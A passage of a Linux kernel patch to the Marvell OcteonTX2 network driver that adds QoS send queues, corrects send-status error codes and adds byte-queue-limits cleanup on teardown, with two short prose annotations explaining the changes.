++	[NIX_SND_STATUS_CRC_ERR] = "NIX_SND_STATUS_CRC_ERR",
++	[NIX_SND_STATUS_IMM_ERR] = "NIX_SND_STATUS_IMM_ERR",
++	[NIX_SND_STATUS_SG_ERR] = "NIX_SND_STATUS_SG_ERR",
++	[NIX_SND_STATUS_MEM_ERR] = "NIX_SND_STATUS_MEM_ERR",
++	[NIX_SND_STATUS_INVALID_SUBDC] = "NIX_SND_STATUS_INVALID_SUBDC",
++	[NIX_SND_STATUS_SUBDC_ORDER_ERR] = "NIX_SND_STATUS_SUBDC_ORDER_ERR",
++	[NIX_SND_STATUS_DATA_FAULT] = "NIX_SND_STATUS_DATA_FAULT",
++	[NIX_SND_STATUS_DATA_POISON] = "NIX_SND_STATUS_DATA_POISON",
++	[NIX_SND_STATUS_NPC_DROP_ACTION] = "NIX_SND_STATUS_NPC_DROP_ACTION",
++	[NIX_SND_STATUS_LOCK_VIOL] = "NIX_SND_STATUS_LOCK_VIOL",
++	[NIX_SND_STATUS_NPC_UCAST_CHAN_ERR] = "NIX_SND_STAT_NPC_UCAST_CHAN_ERR",
++	[NIX_SND_STATUS_NPC_MCAST_CHAN_ERR] = "NIX_SND_STAT_NPC_MCAST_CHAN_ERR",
++	[NIX_SND_STATUS_NPC_MCAST_ABORT] = "NIX_SND_STATUS_NPC_MCAST_ABORT",
++	[NIX_SND_STATUS_NPC_VTAG_PTR_ERR] = "NIX_SND_STATUS_NPC_VTAG_PTR_ERR",
++	[NIX_SND_STATUS_NPC_VTAG_SIZE_ERR] = "NIX_SND_STATUS_NPC_VTAG_SIZE_ERR",
++	[NIX_SND_STATUS_SEND_MEM_FAULT] = "NIX_SND_STATUS_SEND_MEM_FAULT",
++	[NIX_SND_STATUS_SEND_STATS_ERR] = "NIX_SND_STATUS_SEND_STATS_ERR",
+ };
+ 
+ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ {
+ 	struct otx2_nic *pf = data;
++	struct otx2_snd_queue *sq;
+ 	u64 val, *ptr;
+ 	u64 qidx = 0;
+ 
+@@ -1238,14 +1241,16 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			continue;
+ 
+ 		if (val & BIT_ULL(42)) {
+-			netdev_err(pf->netdev, "CQ%lld: error reading NIX_LF_CQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
++			netdev_err(pf->netdev,
++				   "CQ%lld: error reading NIX_LF_CQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
+ 				   qidx, otx2_read64(pf, NIX_LF_ERR_INT));
+ 		} else {
+ 			if (val & BIT_ULL(NIX_CQERRINT_DOOR_ERR))
+ 				netdev_err(pf->netdev, "CQ%lld: Doorbell error",
+ 					   qidx);
+ 			if (val & BIT_ULL(NIX_CQERRINT_CQE_FAULT))
+-				netdev_err(pf->netdev, "CQ%lld: Memory fault on CQE write to LLC/DRAM",
++				netdev_err(pf->netdev,
++					   "CQ%lld: Memory fault on CQE write to LLC/DRAM",
+ 					   qidx);
+ 		}
+ 
+@@ -1253,10 +1258,14 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 	}
+ 
+ 	/* SQ */
+-	for (qidx = 0; qidx < pf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pf); qidx++) {
+ 		u64 sq_op_err_dbg, mnq_err_dbg, snd_err_dbg;
+ 		u8 sq_op_err_code, mnq_err_code, snd_err_code;
+ 
++		sq = &pf->qset.sq[qidx];
++		if (!sq->sqb_ptrs)
++			continue;
++
+ 		/* Below debug registers captures first errors corresponding to
+ 		 * those registers. We don't have to check against SQ qid as
+ 		 * these are fatal errors.
+@@ -1268,7 +1277,8 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			     (val & NIX_SQINT_BITS));
+ 
+ 		if (val & BIT_ULL(42)) {
+-			netdev_err(pf->netdev, "SQ%lld: error reading NIX_LF_SQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
++			netdev_err(pf->netdev,
++				   "SQ%lld: error reading NIX_LF_SQ_OP_INT, NIX_LF_ERR_INT 0x%llx\n",
+ 				   qidx, otx2_read64(pf, NIX_LF_ERR_INT));
+ 			goto done;
+ 		}
+@@ -1278,8 +1288,11 @@ static irqreturn_t otx2_q_intr_handler(int irq, void *data)
+ 			goto chk_mnq_err_dbg;
+ 
+ 		sq_op_err_code = FIELD_GET(GENMASK(7, 0), sq_op_err_dbg);
+-		netdev_err(pf->netdev, "SQ%lld: NIX_LF_SQ_OP_ERR_DBG(%llx)  err=%s\n",
+-			   qidx, sq_op_err_dbg, nix_sqoperr_e_str[sq_op_err_code]);
++		netdev_err(pf->netdev,
++			   "SQ%lld: NIX_LF_SQ_OP_ERR_DBG(0x%llx)  err=%s(%#x)\n",
++			   qidx, sq_op_err_dbg,
++			   nix_sqoperr_e_str[sq_op_err_code],
++			   sq_op_err_code);
+ 
+ 		otx2_write64(pf, NIX_LF_SQ_OP_ERR_DBG, BIT_ULL(44));
+ 
+@@ -1296,16 +1309,21 @@ chk_mnq_err_dbg:
+ 			goto chk_snd_err_dbg;
+ 
+ 		mnq_err_code = FIELD_GET(GENMASK(7, 0), mnq_err_dbg);
+-		netdev_err(pf->netdev, "SQ%lld: NIX_LF_MNQ_ERR_DBG(%llx)  err=%s\n",
+-			   qidx, mnq_err_dbg,  nix_mnqerr_e_str[mnq_err_code]);
++		netdev_err(pf->netdev,
++			   "SQ%lld: NIX_LF_MNQ_ERR_DBG(0x%llx)  err=%s(%#x)\n",
++			   qidx, mnq_err_dbg, nix_mnqerr_e_str[mnq_err_code],
++			   mnq_err_code);
+ 		otx2_write64(pf, NIX_LF_MNQ_ERR_DBG, BIT_ULL(44));
+ 
+ chk_snd_err_dbg:
+ 		snd_err_dbg = otx2_read64(pf, NIX_LF_SEND_ERR_DBG);
+ 		if (snd_err_dbg & BIT(44)) {
+ 			snd_err_code = FIELD_GET(GENMASK(7, 0), snd_err_dbg);
+-			netdev_err(pf->netdev, "SQ%lld: NIX_LF_SND_ERR_DBG:0x%llx err=%s\n",
+-				   qidx, snd_err_dbg, nix_snd_status_e_str[snd_err_code]);
++			netdev_err(pf->netdev,
++				   "SQ%lld: NIX_LF_SND_ERR_DBG:0x%llx err=%s(%#x)\n",
++				   qidx, snd_err_dbg,
++				   nix_snd_status_e_str[snd_err_code],
++				   snd_err_code);
+ 			otx2_write64(pf, NIX_LF_SEND_ERR_DBG, BIT_ULL(44));
+ 		}
+ 
+@@ -1379,7 +1397,7 @@ static void otx2_free_sq_res(struct otx2_nic *pf)
+ 	otx2_ctx_disable(&pf->mbox, NIX_AQ_CTYPE_SQ, false);
+ 	/* Free SQB pointers */
+ 	otx2_sq_free_sqbs(pf);
+-	for (qidx = 0; qidx < pf->hw.tot_tx_queues; qidx++) {
++	for (qidx = 0; qidx < otx2_get_total_tx_queues(pf); qidx++) {
+ 		sq = &qset->sq[qidx];
+ 		qmem_free(pf->dev, sq->sqe);
+ 		qmem_free(pf->dev, sq->tso_hdrs);
+@@ -1429,7 +1447,7 @@ static int otx2_init_hw_resources(struct otx2_nic *pf)
+ 	 * so, aura count = pool count.
+ 	 */
+ 	hw->rqpool_cnt = hw->rx_queues;
+-	hw->sqpool_cnt = hw->tot_tx_queues;
++	hw->sqpool_cnt = otx2_get_total_tx_queues(pf);
+ 	hw->pool_cnt = hw->rqpool_cnt + hw->sqpool_cnt;
+ 
+ 	/* Maximum hardware supported transmit length */
+@@ -1578,6 +1596,7 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 		else
+ 			otx2_cleanup_tx_cqes(pf, cq);
+ 	}
++	otx2_free_pending_sqe(pf);
+ 
+ 	otx2_free_sq_res(pf);
+ 
+@@ -1682,11 +1701,14 @@ int otx2_open(struct net_device *netdev)
+ 
+ 	netif_carrier_off(netdev);
+ 
+-	pf->qset.cq_cnt = pf->hw.rx_queues + pf->hw.tot_tx_queues;
+ 	/* RQ and SQs are mapped to different CQs,
+ 	 * so find out max CQ IRQs (i.e CINTs) needed.
+ 	 */
+-	pf->hw.cint_cnt = max(pf->hw.rx_queues, pf->hw.tx_queues);
++	pf->hw.cint_cnt = max3(pf->hw.rx_queues, pf->hw.tx_queues,
++			       pf->hw.tc_tx_queues);
++
++	pf->qset.cq_cnt = pf->hw.rx_queues + otx2_get_total_tx_queues(pf);
++
+ 	qset->napi = kcalloc(pf->hw.cint_cnt, sizeof(*cq_poll), GFP_KERNEL);
+ 	if (!qset->napi)
+ 		return -ENOMEM;
+@@ -1702,7 +1724,7 @@ int otx2_open(struct net_device *netdev)
+ 	if (!qset->cq)
+ 		goto err_free_mem;
+ 
+-	qset->sq = kcalloc(pf->hw.tot_tx_queues,
++	qset->sq = kcalloc(pf->hw.non_qos_queues,
+ 			   sizeof(struct otx2_snd_queue), GFP_KERNEL);
+ 	if (!qset->sq)
+ 		goto err_free_mem;
+@@ -1737,6 +1759,11 @@ int otx2_open(struct net_device *netdev)
+ 		else
+ 			cq_poll->cq_ids[CQ_XDP] = CINT_INVALID_CQ;
+ 
++		cq_poll->cq_ids[CQ_QOS] = (qidx < pf->hw.tc_tx_queues) ?
++					  (qidx + pf->hw.rx_queues +
++					   pf->hw.non_qos_queues) :
++					  CINT_INVALID_CQ;
++
+ 		cq_poll->dev = (void *)pf;
+ 		cq_poll->dim.mode = DIM_CQ_PERIOD_MODE_START_FROM_CQE;
+ 		INIT_WORK(&cq_poll->dim.work, otx2_dim_work);
+@@ -1941,6 +1968,12 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	int qidx = skb_get_queue_mapping(skb);
+ 	struct otx2_snd_queue *sq;
+ 	struct netdev_queue *txq;
++	int sq_idx;
++
++	/* XDP SQs are not mapped to TXQs; advance the qid to derive the
++	 * correct SQ index once QoS queues are in play.
++	 */
++	sq_idx = (qidx >= pf->hw.tx_queues) ? (qidx + pf->hw.xdp_queues) : qidx;
+ 
+ 	/* Check for minimum and maximum packet length */
+ 	if (skb->len <= ETH_HLEN ||
+@@ -1949,7 +1982,7 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+-	sq = &pf->qset.sq[qidx];
++	sq = &pf->qset.sq[sq_idx];
+ 	txq = netdev_get_tx_queue(netdev, qidx);
+ 
+ 	if (!otx2_sq_append_skb(netdev, sq, skb, qidx)) {
+@@ -1967,8 +2000,8 @@ static netdev_tx_t otx2_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	return NETDEV_TX_OK;
+ }
+ 
+-static u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
+-			     struct net_device *sb_dev)
++u16 otx2_select_queue(struct net_device *netdev, struct sk_buff *skb,
++		      struct net_device *sb_dev)
+ {
+ #ifdef CONFIG_DCB
+ 	struct otx2_nic *pf = netdev_priv(netdev);
+@@ -1990,6 +2023,7 @@ pick_tx:
+ #endif
+ 	return netdev_pick_tx(netdev, skb, NULL);
+ }
++EXPORT_SYMBOL(otx2_select_queue);
+ 
+ static netdev_features_t otx2_fix_features(struct net_device *dev,
+ 					   netdev_features_t features)
+@@ -2520,7 +2554,7 @@ static int otx2_xdp_setup(struct otx2_nic *pf, struct bpf_prog *prog)
+ 	else
+ 		pf->hw.xdp_queues = 0;
+ 
+-	pf->hw.tot_tx_queues += pf->hw.xdp_queues;
++	pf->hw.non_qos_queues += pf->hw.xdp_queues;
+ 
+ 	if (if_up)
+ 		otx2_open(pf->netdev);
+@@ -2703,10 +2737,10 @@ static void otx2_sriov_vfcfg_cleanup(struct otx2_nic *pf)
+ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct device *dev = &pdev->dev;
++	int err, qcount, qos_txqs;
+ 	struct net_device *netdev;
+ 	struct otx2_nic *pf;
+ 	struct otx2_hw *hw;
+-	int err, qcount;
+ 	int num_vec;
+ 
+ 	err = pcim_enable_device(pdev);
+@@ -2731,8 +2765,9 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	/* Set number of queues */
+ 	qcount = min_t(int, num_online_cpus(), OTX2_MAX_CQ_CNT);
++	qos_txqs = min_t(int, qcount, OTX2_QOS_MAX_LEAF_NODES);
+ 
+-	netdev = alloc_etherdev_mqs(sizeof(*pf), qcount, qcount);
++	netdev = alloc_etherdev_mqs(sizeof(*pf), qcount + qos_txqs, qcount);
+ 	if (!netdev) {
+ 		err = -ENOMEM;
+ 		goto err_release_regions;
+@@ -2751,7 +2786,7 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	hw->pdev = pdev;
+ 	hw->rx_queues = qcount;
+ 	hw->tx_queues = qcount;
+-	hw->tot_tx_queues = qcount;
++	hw->non_qos_queues = qcount;
+ 	hw->max_queues = qcount;
+ 	hw->rbuf_len = OTX2_DEFAULT_RBUF_LEN;
+ 	/* Use CQE of 128 byte descriptor size by default */
+@@ -2919,6 +2954,8 @@ static int otx2_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err_pf_sriov_init;
+ #endif
+ 
++	otx2_qos_init(pf, qos_txqs);
++
+ 	return 0;
+ 
+ err_pf_sriov_init:
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
+index fa37b9f312cae..4e5899d8fa2e6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_struct.h
+@@ -318,23 +318,23 @@ enum nix_snd_status_e {
+ 	NIX_SND_STATUS_EXT_ERR = 0x6,
+ 	NIX_SND_STATUS_JUMP_FAULT = 0x7,
+ 	NIX_SND_STATUS_JUMP_POISON = 0x8,
+-	NIX_SND_STATUS_CRC_ERR = 0x9,
+-	NIX_SND_STATUS_IMM_ERR = 0x10,
+-	NIX_SND_STATUS_SG_ERR = 0x11,
+-	NIX_SND_STATUS_MEM_ERR = 0x12,
+-	NIX_SND_STATUS_INVALID_SUBDC = 0x13,
+-	NIX_SND_STATUS_SUBDC_ORDER_ERR = 0x14,
+-	NIX_SND_STATUS_DATA_FAULT = 0x15,
+-	NIX_SND_STATUS_DATA_POISON = 0x16,
+-	NIX_SND_STATUS_NPC_DROP_ACTION = 0x17,
+-	NIX_SND_STATUS_LOCK_VIOL = 0x18,
+-	NIX_SND_STATUS_NPC_UCAST_CHAN_ERR = 0x19,
+-	NIX_SND_STATUS_NPC_MCAST_CHAN_ERR = 0x20,
+-	NIX_SND_STATUS_NPC_MCAST_ABORT = 0x21,
+-	NIX_SND_STATUS_NPC_VTAG_PTR_ERR = 0x22,
+-	NIX_SND_STATUS_NPC_VTAG_SIZE_ERR = 0x23,
+-	NIX_SND_STATUS_SEND_MEM_FAULT = 0x24,
+-	NIX_SND_STATUS_SEND_STATS_ERR = 0x25,
++	NIX_SND_STATUS_CRC_ERR = 0x10,
++	NIX_SND_STATUS_IMM_ERR = 0x11,
++	NIX_SND_STATUS_SG_ERR = 0x12,
++	NIX_SND_STATUS_MEM_ERR = 0x13,
++	NIX_SND_STATUS_INVALID_SUBDC = 0x14,
++	NIX_SND_STATUS_SUBDC_ORDER_ERR = 0x15,
++	NIX_SND_STATUS_DATA_FAULT = 0x16,
++	NIX_SND_STATUS_DATA_POISON = 0x17,
++	NIX_SND_STATUS_NPC_DROP_ACTION = 0x20,
++	NIX_SND_STATUS_LOCK_VIOL = 0x21,
++	NIX_SND_STATUS_NPC_UCAST_CHAN_ERR = 0x22,
++	NIX_SND_STATUS_NPC_MCAST_CHAN_ERR = 0x23,
++	NIX_SND_STATUS_NPC_MCAST_ABORT = 0x24,
++	NIX_SND_STATUS_NPC_VTAG_PTR_ERR = 0x25,
++	NIX_SND_STATUS_NPC_VTAG_SIZE_ERR = 0x26,
++	NIX_SND_STATUS_SEND_MEM_FAULT = 0x27,
++	NIX_SND_STATUS_SEND_STATS_ERR = 0x28,
+ 	NIX_SND_STATUS_MAX,
+ };
+ 
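Note that the corrected encoding leaves real gaps (0x9-0xf and 0x18-0x1f carry no status), so the designated-initializer string tables earlier in this patch hold NULL in those slots. The driver indexes the tables directly; a defensive lookup, if one were wanted, would be a small wrapper along these lines (hypothetical helper, not part of the patch):

	static const char *nix_snd_status_str(u8 code)
	{
		if (code >= NIX_SND_STATUS_MAX || !nix_snd_status_e_str[code])
			return "UNKNOWN";
		return nix_snd_status_e_str[code];
	}
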
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+index 5704fb75fa477..20d801d30c732 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.c
+@@ -468,12 +468,13 @@ process_cqe:
+ 			break;
+ 		}
+ 
+-		if (cq->cq_type == CQ_XDP) {
++		qidx = cq->cq_idx - pfvf->hw.rx_queues;
++
++		if (cq->cq_type == CQ_XDP)
+ 			otx2_xdp_snd_pkt_handler(pfvf, sq, cqe);
+-		} else {
+-			otx2_snd_pkt_handler(pfvf, cq, sq, cqe, budget,
+-					     &tx_pkts, &tx_bytes);
+-		}
++		else
++			otx2_snd_pkt_handler(pfvf, cq, &pfvf->qset.sq[qidx],
++					     cqe, budget, &tx_pkts, &tx_bytes);
+ 
+ 		cqe->hdr.cqe_type = NIX_XQE_TYPE_INVALID;
+ 		processed_cqe++;
+@@ -490,7 +491,11 @@ process_cqe:
+ 	if (likely(tx_pkts)) {
+ 		struct netdev_queue *txq;
+ 
+-		txq = netdev_get_tx_queue(pfvf->netdev, cq->cint_idx);
++		qidx = cq->cq_idx - pfvf->hw.rx_queues;
++
++		if (qidx >= pfvf->hw.tx_queues)
++			qidx -= pfvf->hw.xdp_queues;
++		txq = netdev_get_tx_queue(pfvf->netdev, qidx);
+ 		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
+ 		/* Check if queue was stopped earlier due to ring full */
+ 		smp_mb();
+@@ -738,7 +743,8 @@ static void otx2_sqe_add_hdr(struct otx2_nic *pfvf, struct otx2_snd_queue *sq,
+ 		sqe_hdr->aura = sq->aura_id;
+ 		/* Post a CQE Tx after pkt transmission */
+ 		sqe_hdr->pnc = 1;
+-		sqe_hdr->sq = qidx;
++		sqe_hdr->sq = (qidx >= pfvf->hw.tx_queues) ?
++			       qidx + pfvf->hw.xdp_queues : qidx;
+ 	}
+ 	sqe_hdr->total = skb->len;
+ 	/* Set SQE identifier which will be used later for freeing SKB */
+@@ -1218,13 +1224,17 @@ void otx2_cleanup_rx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ 
+ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ {
++	int tx_pkts = 0, tx_bytes = 0;
+ 	struct sk_buff *skb = NULL;
+ 	struct otx2_snd_queue *sq;
+ 	struct nix_cqe_tx_s *cqe;
++	struct netdev_queue *txq;
+ 	int processed_cqe = 0;
+ 	struct sg_list *sg;
++	int qidx;
+ 
+-	sq = &pfvf->qset.sq[cq->cint_idx];
++	qidx = cq->cq_idx - pfvf->hw.rx_queues;
++	sq = &pfvf->qset.sq[qidx];
+ 
+ 	if (otx2_nix_cq_op_status(pfvf, cq) || !cq->pend_cqe)
+ 		return;
+@@ -1239,12 +1249,20 @@ void otx2_cleanup_tx_cqes(struct otx2_nic *pfvf, struct otx2_cq_queue *cq)
+ 		sg = &sq->sg[cqe->comp.sqe_id];
+ 		skb = (struct sk_buff *)sg->skb;
+ 		if (skb) {
++			tx_bytes += skb->len;
++			tx_pkts++;
+ 			otx2_dma_unmap_skb_frags(pfvf, sg);
+ 			dev_kfree_skb_any(skb);
+ 			sg->skb = (u64)NULL;
+ 		}
+ 	}
+ 
++	if (likely(tx_pkts)) {
++		if (qidx >= pfvf->hw.tx_queues)
++			qidx -= pfvf->hw.xdp_queues;
++		txq = netdev_get_tx_queue(pfvf->netdev, qidx);
++		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
++	}
+ 	/* Free CQEs to HW */
+ 	otx2_write64(pfvf, NIX_LF_CQ_OP_DOOR,
+ 		     ((u64)cq->cq_idx << 32) | processed_cqe);
+@@ -1271,6 +1289,38 @@ int otx2_rxtx_enable(struct otx2_nic *pfvf, bool enable)
+ 	return err;
+ }
+ 
++void otx2_free_pending_sqe(struct otx2_nic *pfvf)
++{
++	int tx_pkts = 0, tx_bytes = 0;
++	struct sk_buff *skb = NULL;
++	struct otx2_snd_queue *sq;
++	struct netdev_queue *txq;
++	struct sg_list *sg;
++	int sq_idx, sqe;
++
++	for (sq_idx = 0; sq_idx < pfvf->hw.tx_queues; sq_idx++) {
++		sq = &pfvf->qset.sq[sq_idx];
++		for (sqe = 0; sqe < sq->sqe_cnt; sqe++) {
++			sg = &sq->sg[sqe];
++			skb = (struct sk_buff *)sg->skb;
++			if (skb) {
++				tx_bytes += skb->len;
++				tx_pkts++;
++				otx2_dma_unmap_skb_frags(pfvf, sg);
++				dev_kfree_skb_any(skb);
++				sg->skb = (u64)NULL;
++			}
++		}
++
++		if (!tx_pkts)
++			continue;
++		txq = netdev_get_tx_queue(pfvf->netdev, sq_idx);
++		netdev_tx_completed_queue(txq, tx_pkts, tx_bytes);
++		tx_pkts = 0;
++		tx_bytes = 0;
++	}
++}
++
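otx2_free_pending_sqe() pairs with the byte queue limits (BQL) accounting on the transmit path: every byte reported through netdev_tx_sent_queue() when an SQE is queued must eventually come back through netdev_tx_completed_queue(), even for packets discarded during teardown, or BQL still believes those bytes are in flight and can stall the queue after the interface comes back up. A minimal sketch of that contract; the helper names are invented for illustration:

	#include <linux/netdevice.h>

	/* TX side: account bytes as the descriptor is posted. */
	static void tx_one(struct netdev_queue *txq, struct sk_buff *skb)
	{
		netdev_tx_sent_queue(txq, skb->len);
		/* ... hand the buffer to hardware ... */
	}

	/* Completion or cleanup side: every sent byte completes exactly
	 * once, whether it was transmitted or freed on teardown.
	 */
	static void complete_batch(struct netdev_queue *txq,
				   unsigned int pkts, unsigned int bytes)
	{
		netdev_tx_completed_queue(txq, pkts, bytes);
	}
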
+ static void otx2_xdp_sqe_add_sg(struct otx2_snd_queue *sq, u64 dma_addr,
+ 				int len, int *offset)
+ {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
+index 93cac2c2664c2..7ab6db9a986fa 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_txrx.h
+@@ -102,7 +102,8 @@ enum cq_type {
+ 	CQ_RX,
+ 	CQ_TX,
+ 	CQ_XDP,
+-	CQS_PER_CINT = 3, /* RQ + SQ + XDP */
++	CQ_QOS,
++	CQS_PER_CINT = 4, /* RQ + SQ + XDP + QOS_SQ */
+ };
+ 
+ struct otx2_cq_poll {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index f8f0c01f62a14..404855bccb4b6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -475,6 +475,7 @@ static const struct net_device_ops otx2vf_netdev_ops = {
+ 	.ndo_open = otx2vf_open,
+ 	.ndo_stop = otx2vf_stop,
+ 	.ndo_start_xmit = otx2vf_xmit,
++	.ndo_select_queue = otx2_select_queue,
+ 	.ndo_set_rx_mode = otx2vf_set_rx_mode,
+ 	.ndo_set_mac_address = otx2_set_mac_address,
+ 	.ndo_change_mtu = otx2vf_change_mtu,
+@@ -520,10 +521,10 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	int num_vec = pci_msix_vec_count(pdev);
+ 	struct device *dev = &pdev->dev;
++	int err, qcount, qos_txqs;
+ 	struct net_device *netdev;
+ 	struct otx2_nic *vf;
+ 	struct otx2_hw *hw;
+-	int err, qcount;
+ 
+ 	err = pcim_enable_device(pdev);
+ 	if (err) {
+@@ -546,7 +547,8 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	pci_set_master(pdev);
+ 
+ 	qcount = num_online_cpus();
+-	netdev = alloc_etherdev_mqs(sizeof(*vf), qcount, qcount);
++	qos_txqs = min_t(int, qcount, OTX2_QOS_MAX_LEAF_NODES);
++	netdev = alloc_etherdev_mqs(sizeof(*vf), qcount + qos_txqs, qcount);
+ 	if (!netdev) {
+ 		err = -ENOMEM;
+ 		goto err_release_regions;
+@@ -566,7 +568,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	hw->rx_queues = qcount;
+ 	hw->tx_queues = qcount;
+ 	hw->max_queues = qcount;
+-	hw->tot_tx_queues = qcount;
++	hw->non_qos_queues = qcount;
+ 	hw->rbuf_len = OTX2_DEFAULT_RBUF_LEN;
+ 	/* Use CQE of 128 byte descriptor size by default */
+ 	hw->xqe_size = 128;
+@@ -695,6 +697,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (err)
+ 		goto err_shutdown_tc;
+ #endif
++	otx2_qos_init(vf, qos_txqs);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/qos.h b/drivers/net/ethernet/marvell/octeontx2/nic/qos.h
+new file mode 100644
+index 0000000000000..73a62d092e99a
+--- /dev/null
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/qos.h
+@@ -0,0 +1,19 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* Marvell RVU Ethernet driver
++ *
++ * Copyright (C) 2023 Marvell.
++ *
++ */
++#ifndef OTX2_QOS_H
++#define OTX2_QOS_H
++
++#define OTX2_QOS_MAX_LEAF_NODES                16
++
++int otx2_qos_enable_sq(struct otx2_nic *pfvf, int qidx, u16 smq);
++void otx2_qos_disable_sq(struct otx2_nic *pfvf, int qidx, u16 mdq);
++
++struct otx2_qos {
++	u16 qid_to_sqmap[OTX2_QOS_MAX_LEAF_NODES];
++};
++
++#endif
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c b/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c
+new file mode 100644
+index 0000000000000..e142d43f5a62c
+--- /dev/null
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/qos_sq.c
+@@ -0,0 +1,282 @@
++// SPDX-License-Identifier: GPL-2.0
++/* Marvell RVU Physical Function ethernet driver
++ *
++ * Copyright (C) 2023 Marvell.
++ *
++ */
++
++#include <linux/netdevice.h>
++#include <net/tso.h>
++
++#include "cn10k.h"
++#include "otx2_reg.h"
++#include "otx2_common.h"
++#include "otx2_txrx.h"
++#include "otx2_struct.h"
++
++#define OTX2_QOS_MAX_LEAF_NODES 16
++
++static void otx2_qos_aura_pool_free(struct otx2_nic *pfvf, int pool_id)
++{
++	struct otx2_pool *pool;
++
++	if (!pfvf->qset.pool)
++		return;
++
++	pool = &pfvf->qset.pool[pool_id];
++	qmem_free(pfvf->dev, pool->stack);
++	qmem_free(pfvf->dev, pool->fc_addr);
++	pool->stack = NULL;
++	pool->fc_addr = NULL;
++}
++
++static int otx2_qos_sq_aura_pool_init(struct otx2_nic *pfvf, int qidx)
++{
++	struct otx2_qset *qset = &pfvf->qset;
++	int pool_id, stack_pages, num_sqbs;
++	struct otx2_hw *hw = &pfvf->hw;
++	struct otx2_snd_queue *sq;
++	struct otx2_pool *pool;
++	dma_addr_t bufptr;
++	int err, ptr;
++	u64 iova, pa;
++
++	/* Calculate number of SQBs needed.
++	 *
++	 * For a 128-byte SQE and a 4K SQB, 31 SQEs fit in one SQB.
++	 * The last SQE is used to point to the next SQB.
++	 */
++	num_sqbs = (hw->sqb_size / 128) - 1;
++	num_sqbs = (qset->sqe_cnt + num_sqbs) / num_sqbs;
++
++	/* Get the number of stack pages needed */
++	stack_pages =
++		(num_sqbs + hw->stack_pg_ptrs - 1) / hw->stack_pg_ptrs;
++
++	pool_id = otx2_get_pool_idx(pfvf, AURA_NIX_SQ, qidx);
++	pool = &pfvf->qset.pool[pool_id];
++
++	/* Initialize aura context */
++	err = otx2_aura_init(pfvf, pool_id, pool_id, num_sqbs);
++	if (err)
++		return err;
++
++	/* Initialize pool context */
++	err = otx2_pool_init(pfvf, pool_id, stack_pages,
++			     num_sqbs, hw->sqb_size);
++	if (err)
++		goto aura_free;
++
++	/* Flush accumulated messages */
++	err = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (err)
++		goto pool_free;
++
++	/* Allocate pointers and free them to aura/pool */
++	sq = &qset->sq[qidx];
++	sq->sqb_count = 0;
++	sq->sqb_ptrs = kcalloc(num_sqbs, sizeof(*sq->sqb_ptrs), GFP_KERNEL);
++	if (!sq->sqb_ptrs) {
++		err = -ENOMEM;
++		goto pool_free;
++	}
++
++	for (ptr = 0; ptr < num_sqbs; ptr++) {
++		err = otx2_alloc_rbuf(pfvf, pool, &bufptr);
++		if (err)
++			goto sqb_free;
++		pfvf->hw_ops->aura_freeptr(pfvf, pool_id, bufptr);
++		sq->sqb_ptrs[sq->sqb_count++] = (u64)bufptr;
++	}
++
++	return 0;
++
++sqb_free:
++	while (ptr--) {
++		if (!sq->sqb_ptrs[ptr])
++			continue;
++		iova = sq->sqb_ptrs[ptr];
++		pa = otx2_iova_to_phys(pfvf->iommu_domain, iova);
